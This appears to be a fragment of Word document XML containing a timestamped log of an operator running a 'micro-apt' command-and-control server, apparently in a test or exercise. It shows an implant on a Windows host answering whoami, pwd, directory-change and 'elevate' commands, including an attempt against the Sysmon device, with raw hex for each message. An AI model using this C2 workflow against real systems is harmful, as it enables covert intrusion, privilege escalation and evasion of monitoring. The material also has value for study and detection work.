    <w:p w14:paraId="551814FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EA09C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885BEEF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Refresh browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA8DAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/projects/micro-apt# ./c2.py 80                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019D7D3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for connection on port 80                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A799969" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF303B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">connection from (send quit to disconnect micro-apt) ('128.55.12.77', 65184)                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA0E2B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E4D15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00                          ........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FE0B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6CAE42" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 29 00 00 00 01 00 00 00 00 00 00 00 11 00 00 00  )...............                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D661BD4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 11 00 00 00 00 00 00 00 6F 73 3A 0A 3D 3D 3D 0A  ........os:.===.                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146659C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 77 69 6E 2D 78 36 34 0A 00                       win-x64..                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B50A74" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">')\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00os:\n===\nwin-x64\n\x00'            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105EFCDA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">os:                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27170293" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">===                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA90E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">win-x64      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E25BD0B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D221A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506177D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EE565" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F32450" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4FBFD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03D42E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 17 00 00 00 00 00 00 00 06 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EFB62F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D223C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598726B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E45EC5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441478D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606BCE2E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x19\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x000' (25 bytes)              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D195E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 19 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  .... ...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D707491" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 00 00 00 00 30                       ........0                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E34BA9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7EE02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A27573" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80BBDB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB39CCD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04930898" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD5177" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate '\\.\sysmon'                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EAF614" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: "&amp;\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\r\x00\x00\x001'\\\\.\\sysmon'\x00" (38 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF51C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 26 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  &amp;... ...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C212A70" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 0D 00 00 00 31 27 5C 5C 2E 5C 73 79  ........1'\\.\sy                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F660127" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 73 6D 6F 6E 27 00                                smon'.                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746EF64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A87F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F4196" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523E113" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E579D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F40757" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCA5E43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EF906" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F415FF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 17 00 00 00 00 00 00 00 06 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCC807" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2492A011" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: admin   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281378C1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0C5005" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966835F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;pwd                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA85CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x14\x00\x00\x00' (8 bytes)                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B6BA7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 14 00 00 00                          ........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DDB444" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959834D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 2C 00 00 00 15 00 00 00 00 00 00 00 14 00 00 00  ,...............                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0ED858" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 14 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 44 4F  ........C:\WINDO                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E8AB9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 57 53 5C 73 79 73 74 65 6D 33 32 00              WS\system32.                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CC47B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: C:\WINDOWS\system32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA8464" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1675C4C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0AAE9B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd drivers                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D93F83" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: ' \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00drivers\x00' (32 bytes)    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046637D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 20 00 00 00 12 00 00 00 00 00 00 00 08 00 00 00   ...............                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6079163C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 08 00 00 00 00 00 00 00 64 72 69 76 65 72 73 00  ........drivers.                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2056E18D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017AB53" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67146578" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14859007" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F31171" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F0FF09" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3574ADB9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839678D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4661CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00226CDC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd etc                                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B6EBAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1c\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00etc\x00' (28 bytes)     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7BDE5B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 12 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E2C1D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 65 74 63 00              ........etc.                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF3352" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E20A203" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F42309" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0D0DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589516D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
